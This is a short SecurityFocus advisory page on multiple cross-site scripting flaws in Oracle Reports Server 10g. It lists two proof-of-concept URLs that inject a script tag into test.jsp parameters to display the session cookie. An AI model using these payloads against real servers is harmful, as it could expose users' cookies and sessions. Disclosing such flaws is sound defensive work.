Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Oracle Reports Server 10g Multiple Remote Cross-Site Scripting Vulnerabilities

No exploit is required to leverage these issues. The following proof of concept exploits have been made available:

http://paolo/reports/examples/Tools/test.jsp?repprod&desname='<script>alert(document.cookie);</script>

http://paolo/reports/examples/Tools/test.jsp?repprod"<script>alert(document.cookie);</script>







 

Privacy Statement
Copyright 2008, SecurityFocus